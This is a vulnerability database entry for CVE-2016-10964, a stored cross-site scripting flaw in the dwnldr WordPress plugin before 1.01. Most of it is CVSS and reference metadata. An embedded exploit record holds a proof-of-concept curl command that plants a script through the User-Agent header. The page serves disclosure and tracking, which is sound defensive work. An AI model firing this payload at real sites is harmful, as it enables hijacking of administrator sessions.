Search...

CVE-2016-10964

2019-09-16T13:15:00

ID CVE-2016-10964
Type cve
Reporter cve@mitre.org
Modified 2019-09-17T12:47:00

Description

The dwnldr plugin before 1.01 for WordPress has XSS via the User-Agent HTTP header.

JSON Vulners Source

Initial Source

{"id": "CVE-2016-10964", "bulletinFamily": "NVD", "title": "CVE-2016-10964", "description": "The dwnldr plugin before 1.01 for WordPress has XSS via the User-Agent HTTP header.", "published": "2019-09-16T13:15:00", "modified": "2019-09-17T12:47:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10964", "reporter": "cve@mitre.org", "references": ["https://rastating.github.io/dwnldr-1-0-stored-xss-disclosure/", "https://wordpress.org/plugins/dwnldr/#developers"], "cvelist": ["CVE-2016-10964"], "type": "cve", "lastseen": "2021-02-02T06:28:02", "edition": 8, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:702B4A5A-8D11-4242-B5E7-84AAAFB9C11E", "WPEX-ID:8556"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:702B4A5A-8D11-4242-B5E7-84AAAFB9C11E", "WPVDB-ID:8556"]}], "modified": "2021-02-02T06:28:02", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-02-02T06:28:02", "rev": 2}, "vulnersScore": 1.2}, "cpe": [], "affectedSoftware": [{"cpeName": "findshorty:dwnldr", "name": "findshorty dwnldr", "operator": "lt", "version": "1.01"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:findshorty:dwnldr:1.01:*:*:*:*:wordpress:*:*", "versionEndExcluding": "1.01", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://rastating.github.io/dwnldr-1-0-stored-xss-disclosure/", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://rastating.github.io/dwnldr-1-0-stored-xss-disclosure/"}, {"name": "https://wordpress.org/plugins/dwnldr/#developers", "refsource": "MISC", "tags": ["Third Party Advisory", "Release Notes"], "url": "https://wordpress.org/plugins/dwnldr/#developers"}], "immutableFields": []}

{"wpexploit": [{"lastseen": "2021-02-15T22:04:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10964"], "description": "User agent strings are logged when requesting downloads that are processed by dwnldr and displayed back to the admin with no encoding, allowing for scripts to be stored and executed.\n", "modified": "2020-09-22T07:16:40", "published": "2016-07-18T00:00:00", "id": "WPEX-ID:702B4A5A-8D11-4242-B5E7-84AAAFB9C11E", "href": "", "type": "wpexploit", "title": "Dwnldr 1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)", "sourceData": "curl -A \"User-Agent: <script>alert(document.cookie);</script>\" -O http://<target>/?attachment_id=<attachment id> ", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:04:25", "bulletinFamily": "software", "cvelist": ["CVE-2016-10964"], "description": "User agent strings are logged when requesting downloads that are processed by dwnldr and displayed back to the admin with no encoding, allowing for scripts to be stored and executed.\n\n### PoC\n\ncurl -A \"User-Agent: \" -O http:///?attachment_id=\n", "modified": "2020-09-22T07:16:40", "published": "2016-07-18T00:00:00", "id": "WPVDB-ID:702B4A5A-8D11-4242-B5E7-84AAAFB9C11E", "href": "https://wpscan.com/vulnerability/702b4a5a-8d11-4242-b5e7-84aaafb9c11e", "type": "wpvulndb", "title": "Dwnldr 1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}